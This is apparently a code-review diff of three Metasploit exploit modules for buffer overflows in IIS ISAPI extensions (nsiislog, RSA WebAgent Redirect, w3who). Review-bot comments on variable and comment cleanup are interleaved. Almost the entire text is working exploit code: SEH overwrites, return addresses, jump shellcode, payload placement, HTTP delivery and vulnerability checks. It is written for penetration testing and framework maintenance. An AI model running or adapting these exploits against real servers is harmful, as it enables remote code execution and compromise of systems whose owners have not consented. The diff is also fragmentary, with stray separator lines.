@ -86,17 +84,15 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
|
|||
pat[ target['Rets'][0] - 4, seh.length] = seh
|
||||
buf << pat
|
||||
|
||||
req = c.request({
|
||||
print_status("Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['URL'],
|
||||
'method' => 'POST',
|
||||
'user-agent' => 'NSPlayer/2.0',
|
||||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'data' => buf,
|
||||
})
|
||||
|
||||
print_status("Sending request...")
|
||||
c.send_request(req, 0)
|
||||
|
||||
'data' => buf
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
|
|
@ -62,8 +62,11 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
r = c.send_request(c.request({ 'uri' => datastore['URL'] + '?GetPic?image=msf' }))
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
'query' => 'GetPic?image=msf'
|
||||
}, -1)
|
||||
|
||||
if (r and r.body and r.body =~ /RSA Web Access Authentication/)
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
@ -71,14 +74,16 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A')
|
||||
|
||||
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
|
||||
seh = generate_seh_payload(target['Rets'][1])
|
||||
pat[target['Rets'][0]-4, seh.length] = seh
|
||||
|
||||
c.send_request(c.request({ 'uri' => datastore['URL'] + '?Redirect?url=' + pat }))
|
||||
|
||||
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
'query' => 'Redirect?url=' + pat
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
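Review bot: the `# HACK` trailing comment added to the `pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A')` line labels a workaround without saying what is being worked around, so a reader cannot tell whether the substitution is a requirement of the target's parser, of the SEH record placed into `pat` below, or of something else. Replace it with a why-comment filled in by the author, along the lines of `# gsub: <reason digits and Z must not appear in the padding>`. `r` is assigned from `send_request_raw` in exploit() but never read.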
|
||||
|
|
|
@ -59,11 +59,9 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
|
|||
|
||||
# Identify the target based on the IIS version
|
||||
def autofilter
|
||||
c = connect
|
||||
|
||||
req = c.request({ 'uri' => datastore['URL'] })
|
||||
res = c.send_request(req, -1)
|
||||
disconnect
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
if (res and res.body =~ /Access Token/)
|
||||
|
@ -82,36 +80,32 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
req = c.request({ 'uri' => datastore['URL'] })
|
||||
res = c.send_request(req, -1)
|
||||
|
||||
require 'pp'
|
||||
pp res
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /Access Token/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
|
||||
buf = Rex::Text.rand_text_english(8192, payload_badchars)
|
||||
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
||||
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
||||
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
||||
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||
|
||||
url = datastore['URL'] + '?' + buf
|
||||
req = c.request({ 'uri' => url })
|
||||
|
||||
print_status("Sending request...")
|
||||
c.send_request(req, 0)
|
||||
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
'query' => buf
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
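Review bot: in exploit() the `url = datastore['URL'] + '?' + buf` line is shown once without a marker; if it survives on the new side it is dead code now that the request passes `'query' => buf` separately, and it keeps a second spelling of the same request around to drift. Delete it, or pass it through the new call instead of `datastore['URL']` plus `'query'`. `r` is assigned but never read; the removal of `require 'pp'` / `pp res` from check() is correct and needs no follow-up.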
|
||||
|
|